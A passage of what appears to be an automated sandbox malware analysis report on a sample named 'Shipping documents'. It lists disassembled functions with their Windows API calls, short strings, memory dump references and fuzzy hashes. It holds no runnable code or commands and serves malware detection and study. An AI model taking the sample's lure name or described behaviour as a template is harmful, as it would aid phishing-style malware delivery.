                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 5$^
                                                                                                          • API String ID: 0-2698666812
                                                                                                          • Opcode ID: 2b90f5a79bcd8015aa84be88f7575ad9d7aa639a1ab45e819a160acda22935b1
                                                                                                          • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                                                                                                          • Opcode Fuzzy Hash: 2b90f5a79bcd8015aa84be88f7575ad9d7aa639a1ab45e819a160acda22935b1
                                                                                                          • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                                                                                                          Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strncmp
                                                                                                          • String ID: Q\E
                                                                                                          • API String ID: 909875538-2189900498
                                                                                                          • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                          • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                                          • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                          • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                          Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                            • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                            • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                            • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                                                          • String ID: AutoIt3GUI$Container
                                                                                                          • API String ID: 2652923123-3941886329
                                                                                                          • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                          • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                          • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                                                          • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                          Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove_strncmp
                                                                                                          • String ID: U$\
                                                                                                          • API String ID: 2666721431-100911408
                                                                                                          • Opcode ID: 7a2f9e98db4c3d05fd9d40de2db00db7aa6c2f6853ec4cd4a34a931cc1ec7d7c
                                                                                                          • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                                          • Opcode Fuzzy Hash: 7a2f9e98db4c3d05fd9d40de2db00db7aa6c2f6853ec4cd4a34a931cc1ec7d7c
                                                                                                          • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                                          Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                          • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                          • String ID: LPT
                                                                                                          • API String ID: 3035604524-1350329615
                                                                                                          • Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                                                                          • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                          • Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                                                                          • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                          Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \$h
                                                                                                          • API String ID: 4104443479-677774858
                                                                                                          • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                          • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                                          • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                          • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                                          Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memcmp
                                                                                                          • String ID: &
                                                                                                          • API String ID: 2931989736-1010288
                                                                                                          • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                          • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                          • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                          • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                          Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: \
                                                                                                          • API String ID: 4104443479-2967466578
                                                                                                          • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                          • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                          • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                          • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                          Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _wcslen.LIBCMT ref: 00466825
                                                                                                          • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CrackInternet_wcslen
                                                                                                          • String ID: |
                                                                                                          • API String ID: 596671847-2343686810
                                                                                                          • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                          • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                          • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                          • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                          Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: '
                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                          • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                          • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                          • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                          • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                          Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _strlen.LIBCMT ref: 0040F858
                                                                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                            • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                          • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$_sprintf_strlen
                                                                                                          • String ID: %02X
                                                                                                          • API String ID: 1921645428-436463671
                                                                                                          • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                          • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                          • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                          • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                          Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: Combobox
                                                                                                          • API String ID: 3850602802-2096851135
                                                                                                          • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                          • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                          • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                          • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                          Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                                          • String ID: edit
                                                                                                          • API String ID: 2978978980-2167791130
                                                                                                          • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                          • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                          • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                          • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                          Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                          • String ID: @
                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                          • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                          • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                          • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                          • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                          Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
